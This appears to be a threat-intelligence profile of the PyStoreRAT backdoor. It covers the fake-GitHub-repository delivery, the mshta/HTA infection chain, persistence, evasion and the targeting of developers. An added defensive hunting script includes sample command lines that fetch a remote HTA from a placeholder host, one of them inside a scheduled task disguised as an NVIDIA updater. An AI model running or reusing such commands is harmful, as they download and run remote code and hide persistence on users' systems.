PyStoreRAT
PyStoreRAT is a previously undocumented, modular, multi-stage Remote Access Trojan/backdoor (JavaScript/HTA-based) delivered via a GitHub supply-chain-style campaign. The operation abuses GitHub trust signals by reactivating long-dormant accounts and publishing polished, likely AI-generated repositories masquerading as legitimate utilities (e.g., OSINT tools, security-themed tools, DeFi/crypto bots, GPT/AI wrappers). After the repositories gain traction (including appearing in trending lists and via artificially inflated stars/forks), the attackers introduce "maintenance" commits that add a loader/backdoor component.
The infection/execution chain described in reporting is as follows: Python/JavaScript loader stubs embedded in the repositories download and execute a remote HTA payload via mshta.exe, which in turn runs PyStoreRAT. PyStoreRAT is designed for long-term persistence and data theft, performs extensive system profiling (including admin-privilege checks), and supports a broad plugin/module execution surface: EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules (including in-memory JavaScript execution). It can download and execute additional payloads; a documented follow-on payload is the Rhadamanthys information stealer, used to exfiltrate sensitive information. PyStoreRAT has also been reported to scan for cryptocurrency wallet files (including Ledger Live, Trezor, Exodus, Atomic, Guarda, BitBox02).
Evasion/adaptation features described include environment checks for specific security products (notably CrowdStrike Falcon and Reason/ReasonLabs, also referenced as CyberReason/ReasonLabs) and altering execution/launch paths when detected. Persistence has been reported via scheduled tasks disguised as NVIDIA application self-updates. Lateral/propagation capability via removable drives (USB) is also described.
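Two of the behaviours above (mshta.exe fetching a remote HTA, and persistence via scheduled tasks posing as NVIDIA self-updates) are observable in process-creation telemetry. The following is an added hunting example, not code from the original page or from any vendor; the event layout, task names and URLs are constructed assumptions for illustration.

```python
"""Added example: flag PyStoreRAT-style behaviours in constructed
Windows process-creation events (image path, command line):
 1. mshta.exe launched with a remote http/https HTA argument
 2. schtasks.exe creating a task whose name mimics an NVIDIA updater
    but whose action runs a script host instead of an NVIDIA binary.
Event format, names and URLs are assumptions, not real telemetry."""
import re
from typing import List, Optional, Tuple

# Constructed sample events (not real indicators).
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    (r"C:\Windows\System32\mshta.exe", "mshta.exe http://placeholder.invalid/u.hta"),
    (r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\dev\local.hta"),
    (r"C:\Windows\System32\schtasks.exe",
     '/Create /TN "NVIDIA App SelfUpdate" /TR "mshta.exe http://placeholder.invalid/p.hta" /SC ONLOGON'),
    (r"C:\Windows\System32\schtasks.exe",
     r'/Create /TN "NvDriverUpdateCheck" /TR "C:\Program Files\NVIDIA Corporation\NVIDIA app\Updater.exe"'),
    (r"C:\Program Files\Git\cmd\git.exe", "git pull origin main"),
]

REMOTE_URL = re.compile(r"https?://\S+", re.IGNORECASE)
NVIDIA_NAME = re.compile(r"nvidia|\bnv[a-z]*update", re.IGNORECASE)
SCRIPT_HOSTS = re.compile(
    r"\b(mshta|wscript|cscript|powershell|pwsh|rundll32)(\.exe)?\b", re.IGNORECASE)
TASK_NAME = re.compile(r'/TN\s+"?([^"/]+)"?', re.IGNORECASE)
TASK_ACTION = re.compile(r'/TR\s+"?([^"]+)"?', re.IGNORECASE)


def classify(image: str, cmdline: str) -> Optional[str]:
    """Return a detection tag for one event, or None if it looks benign."""
    exe = image.rsplit("\\", 1)[-1].lower()
    if exe == "mshta.exe" and REMOTE_URL.search(cmdline):
        return "mshta_remote_hta"
    if exe == "schtasks.exe" and "/create" in cmdline.lower():
        name = (TASK_NAME.search(cmdline) or [None, ""])[1]
        action = (TASK_ACTION.search(cmdline) or [None, ""])[1]
        # NVIDIA-looking task name whose action is a script host, not an NVIDIA binary.
        if NVIDIA_NAME.search(name) and SCRIPT_HOSTS.search(action):
            return "nvidia_lookalike_task_running_script_host"
    return None


def hunt(events: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Return (command line, tag) for every event that matches a rule."""
    hits = []
    for image, cmdline in events:
        tag = classify(image, cmdline)
        if tag:
            hits.append((cmdline, tag))
    return hits
```

The benign NVIDIA task in the sample is not flagged because its action points at an NVIDIA binary rather than a script host; tune SCRIPT_HOSTS and NVIDIA_NAME to your own environment's baseline.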
Command-and-control is characterized as resilient, using a rotating/circular set of nodes to enable rapid updates and complicate takedowns. Russian-language artifacts/strings in the codebase have been noted, suggesting a possible Eastern European/Russian linkage, but no definitive attribution is provided in the content. Targeting is described as focused on developers as well as IT administrators, cybersecurity professionals/analysts, and OSINT researchers.
Recent activity
11 sources tracked across advisories, community write-ups, and news.
JavaScript-based RAT delivered via GitHub-hosted fake Python repos; uses a small downloader to fetch and execute a remote HTA payload.
Supply-chain delivered JavaScript/HTA backdoor that establishes long-term persistence, profiles infected systems, acts as a multi-purpose loader for additional payloads, performs AV-aware adaptive evasion (e.g., changes execution paths if certain products are detected), and can spread via removable drives.
A fileless remote access trojan (RAT) that leverages fake GitHub repositories to conduct stealthy attacks, primarily targeting developers.
A remote access trojan (RAT) hidden inside utility tools on GitHub, targeting OSINT and cybersecurity researchers. Used to gain unauthorized access and control over compromised systems.